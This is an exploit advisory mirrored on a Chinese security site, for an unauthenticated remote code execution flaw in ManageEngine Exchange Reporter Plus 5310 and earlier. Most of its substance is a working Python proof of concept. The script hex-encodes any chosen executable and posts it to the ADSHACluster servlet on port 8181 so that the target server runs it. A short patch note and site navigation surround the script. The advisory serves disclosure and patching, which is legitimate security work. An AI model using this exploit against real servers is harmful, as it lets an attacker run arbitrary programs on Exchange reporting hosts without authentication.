首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ManageEngine Exchange Reporter Plus 5310 Remote Code Execution
来源:https://security.szurek.pl 作者:Szurek 发布时间:2018-07-04  
# Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE
# Date: 28-06-2018
# Software Link: https://www.manageengine.com/products/exchange-reports/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote
 
1. Description
  
Java servlet `ADSHACluster` executes `bcp.exe` file which can be passed using `BCP_EXE` param.

https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html
  
2. Proof of Concept

```python
import urllib

file_to_execute = "calc.exe"
ip = "192.168.1.105" 

def to_hex(s):
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)
    
    return reduce(lambda x,y:x+y, lst)

print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"

params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
if '{"STATUS":"error"}' in f.read():
	print "OK"
else:
	print "ERROR"
```

3. Solution:
   
Update to version 5311
https://www.manageengine.com/products/exchange-reports/release-notes.html

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Boxoft WAV To MP3 Converter 1.
·GitList 0.6.0 Argument Injecti
·openslp 2.0.0 Double Free
·ntop-ng Authentication Bypass
·Delta Industrial Automation CO
·Nagios XI 5.2.6-5.4.12 - Chain
·FTPShell Client 6.70 (Enterpri
·SIPp 3.6 - Local Buffer Overfl
·Enhanced Mitigation Experience
·VMware NSX SD-WAN Edge < 3.1.2
·Core FTP LE 2.2 - Buffer Overf
·Geutebruck 5.02024 G-Cam/EFD-2
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved